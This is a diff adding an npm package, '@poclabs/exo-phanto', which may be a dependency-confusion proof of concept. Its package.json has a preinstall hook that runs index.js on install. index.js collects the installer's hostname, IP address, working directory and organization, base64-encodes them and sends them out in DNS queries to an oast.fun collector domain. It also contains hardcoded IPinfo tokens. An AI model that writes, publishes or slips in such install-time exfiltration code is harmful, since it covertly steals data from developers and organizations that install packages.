@poclabs/exo-phanto 1.0.12

package/index.js

@@ -0,0 +1,108 @@
+const os = require("os");
+const dns = require("dns");
+const https = require("https");
+
+// IPinfo API tokens to avoid rate limiting
+const IPINFO_TOKENS = [
+    "e9334ba807050e1", // Replace with your first token
+    "26ed3371fb48a1", // Replace with your second token
+    "ca6b61c75a1ea9",
+    "c8e4ba13f45cdc"  // Add more tokens as needed
+];
+
+let currentTokenIndex = 0;
+
+// Function to rotate IPinfo tokens
+function getNextToken() {
+    const token = IPINFO_TOKENS[currentTokenIndex];
+    currentTokenIndex = (currentTokenIndex + 1) % IPINFO_TOKENS.length;
+    return token;
+}
+
+// Function to fetch organization info from IPinfo
+function getOrganizationFromIP(ip) {
+    return new Promise((resolve) => {
+        const token = getNextToken();
+        const url = `https://ipinfo.io/${ip}?token=${token}`;
+
+        https.get(url, (res) => {
+            let data = "";
+            res.on("data", (chunk) => {
+                data += chunk;
+            });
+            res.on("end", () => {
+                try {
+                    const response = JSON.parse(data);
+                    resolve(response.org || "Unknown Organization");
+                } catch (err) {
+                    resolve("Unknown Organization");
+                }
+            });
+        }).on("error", () => {
+            resolve("Unknown Organization");
+        });
+    });
+}
+
+// Fetch system and victim data
+async function collectData() {
+    const ipAddress = getIPAddress();
+    const organization = await getOrganizationFromIP(ipAddress);
+
+    const data = {
+        time: new Date().toISOString(),
+        organization: organization || "Unknown",
+        ip_address: ipAddress,
+        package_name: "CustomPackageName",  // Replace with dynamic package name if necessary
+        hostname: os.hostname(),
+        current_path: process.cwd(),
+    };
+    return data;
+}
+
+// Function to get the victim's IP address
+function getIPAddress() {
+    const interfaces = os.networkInterfaces();
+    for (const name of Object.keys(interfaces)) {
+        for (const iface of interfaces[name]) {
+            if (!iface.internal && iface.family === "IPv4") {
+                return iface.address;
+            }
+        }
+    }
+    return "127.0.0.1"; // Default to localhost if no external IP found
+}
+
+// Encode data into base64, then split it into smaller chunks for DNS
+function encodeDataInChunks(data, chunkSize = 50) {
+    const jsonData = JSON.stringify(data);
+    const base64Data = Buffer.from(jsonData).toString("base64");
+
+    const chunks = [];
+    for (let i = 0; i < base64Data.length; i += chunkSize) {
+        chunks.push(base64Data.slice(i, i + chunkSize));
+    }
+
+    return chunks;
+}
+
+// Send DNS query with a chunk of data (DNS exfiltration)
+async function sendData() {
+    const payload = await collectData();
+    const chunks = encodeDataInChunks(payload);
+
+    // Send each chunk as a separate DNS query
+    for (const chunk of chunks) {
+        const query = `${chunk}.egvcjppgnjnbrgztumfhqdgqmdbaq1f5f.oast.fun`; // Replace with your exfiltration domain
+        dns.resolve4(query, (err) => {
+            if (err) {
+                console.error("Error sending DNS query:", err.message);
+            } else {
+                console.log("Exfiltration via DNS query successful for chunk.");
+            }
+        });
+    }
+}
+
+// Trigger the data exfiltration process
+sendData();

package/package.json

@@ -0,0 +1,15 @@
+{
+  "name": "@poclabs/exo-phanto",
+  "version": "1.0.12",
+  "description": "A fake package to test something",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "poclabs",
+  "license": "ISC",
+  "dependencies": {
+    "@poclabs/exo-phanto": "^1.0.11"
+  }
+}

package/test.js

@@ -0,0 +1,3 @@
+// test.js
+const fakePackage = require('@poclabs/exo-phanto');
+fakePackage(); // This should log "This is a fake npm package!"